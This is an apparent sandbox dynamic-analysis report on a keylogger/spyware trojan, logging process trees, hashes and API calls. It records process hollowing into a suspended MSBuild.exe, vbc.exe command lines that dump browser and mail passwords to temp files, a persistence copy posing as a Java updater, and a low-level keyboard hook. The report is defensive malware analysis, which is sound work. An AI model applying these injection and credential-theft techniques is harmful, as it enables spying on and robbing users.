b77b82fa...2607 | Sequential Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Keylogger, Spyware, Trojan

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa60 Analysis Target High (Elevated) gmmqacgpk.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe" -
#2 0xb18 Child Process High (Elevated) msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #1
#4 0xbf8 Child Process High (Elevated) vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt #2
#5 0x594 Child Process High (Elevated) vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt #2
#7 0x4e8 Autostart Medium javaupdtr.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe" -
#8 0x708 Child Process Medium msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #7
#9 0x718 Child Process Medium msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #7

Behavior Information - Sequential View

Process #1: gmmqacgpk.exe
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:00:36, Reason: Self Terminated
Monitor Duration 00:00:10
OS Process Information
Information Value
PID 0xa60
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xA64, 0xA74, 0xA78, 0xA7C, 0xA80, 0xA84, 0xB20, 0xB24, 0xB30, 0xB34
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x74843870, 0x74828140 False False
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483BB90, 0x74839940 False False
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483FEDC, 0x74827478, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F386A0, 0x73F37A6C, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F8A650, 0x73E891D0, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F3A025, 0x73F39DF8, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F4FC90 False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F4C0FC False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F33B94, 0x73F53EB4, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F7F441, 0x73F4AADE, ... False False
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483A7F0, 0x74831FAC False False
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp 51 bytes MD5: 112a15fe8f0812fb5b44e44f1b5a8df2
SHA1: fa53bc2d594d4a1307176406fe4c4b63f01607ae
SHA256: fb83cd90872a11a04c5df9734833cf8e0e4adf6af25d9ded59dcbae3e77dfccf
SSDeep: 3:oNBiTktGaACIIUvJLACn:oNUTk4FC1URLNn
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp 64 bytes MD5: 8298bd7dd49a941d4f9dee3f49df4857
SHA1: 8820f66e7123fdfae68c1a049286576c5c58910c
SHA256: 0bba49534b921bcfc1b5f71926165f357add38b22a48763d946d55e4e8ab46db
SSDeep: 3:oNBiTktG+Vh4EaKC5cEcTrkCn:oNUTk4aJaZ5cTTrkCn
False
Threads
Thread 0xa64
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, type = file_type True 2
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, size = 51 True 1
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Process Create process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, os_pid = 0xb18, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Thread Get Context process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, os_tid = 0xa64 True 1
Fn
Memory Read process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 2130567176, size = 4 True 1
Fn
Data
Memory Allocate process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 4194304, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 360448 True 1
Fn
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x400000, size = 512 True 1
Fn
Data
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x402000, size = 328704 True 1
Fn
Data
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x454000, size = 1536 True 1
Fn
Data
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x456000, size = 512 True 1
Fn
Data
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x7efde008, size = 4 True 1
Fn
Data
Thread Set Context process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, os_tid = 0xa64 True 1
Fn
Thread Resume process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, os_tid = 0xa64 True 1
Fn
Thread 0xa78
1 0
Category Operation Information Success Count Logfile
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe True 1
Fn
Process #2: msbuild.exe
1040 89
Information Value
ID #2
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:34, Reason: Child Process
Unmonitor End Time: 00:01:16, Reason: Self Terminated
Monitor Duration 00:00:41
OS Process Information
Information Value
PID 0xb18
Parent PID 0xa60 (c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xB1C, 0xB28, 0xB2C, 0xB38, 0xB3C, 0xB40, 0xB44, 0xB7C, 0xB80, 0xB84, 0xB88, 0xB90, 0xB94, 0xBB8, 0xBBC, 0xBC0, 0xBC4, 0xBC8
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
custommarshalers.ni.dll 0x74750000 0x74789FFF Content Changed - 32-bit 0x74770E64 False False
custommarshalers.ni.dll 0x74750000 0x74789FFF Content Changed - 32-bit 0x74775920 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B3E3B8 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA5380 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B9C558, 0x73B3D8EC False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA94F0, 0x73BA01D0 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA8E08, 0x73BD4B38 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA2800, 0x73BD535C, ... False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BDCDC4 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BD5000, 0x73BDE000, ... False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BE9590, 0x73BA4000 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B9E2A0 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BAB320 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BAB000, 0x73BAAF84, ... False False
buffer 0x006D0000 0x006D0FFF First Execution - 32-bit 0x006D01BC, 0x006D0DD8, ... False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A4D073 False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A4E149 False False
system.xml.ni.dll 0x72480000 0x729B5FFF Content Changed - 32-bit 0x728E650B False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A50050 False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A51000 False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A48650, 0x73A4A320, ... False False
buffer 0x000F8000 0x000F8FFF First Execution - 32-bit 0x000F85F8 False False
buffer 0x00332000 0x00332FFF First Execution - 32-bit 0x003324E0 False False
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x400000, size = 512 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x402000, size = 328704 True 1
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x454000, size = 1536 True 1
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x456000, size = 512 True 1
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x7efde008, size = 4 True 1
Modify Control Flow #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 os_tid = 0xb1c, address = 0x0 True 1
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe 692.00 KB MD5: e4117e6974363cac8b37e5e3ff5d07a6
SHA1: 74a02a421e029d24a1d2c692df28a90296d052d0
SHA256: b77b82fa96b676790b9a207d8208d90ace3a0922d5db5938c446cd22e9132607
SSDeep: 12288:3qPSBEsVqSI0TjVMB2rdet1pEpWI8c8J:8eHVqSmUr0HipF8x
False
Threads
Thread 0xb1c
963 89
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
System Get Info type = Operating System True 1
Environment Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config, type = file_attributes True 1
System Get Info type = Operating System True 1
System Get Info type = Operating System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x74d4ca24 True 1
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 True 1
COM Create interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER True 3
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
System Get Computer Name result_out = XDUWTFONO True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductId, type = REG_NONE False 1
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771625dd True 1
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Window Create class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 True 1
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 1997940189 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 34804490 True 1
System Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0x213162a True 1
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
System Get Info type = Operating System True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
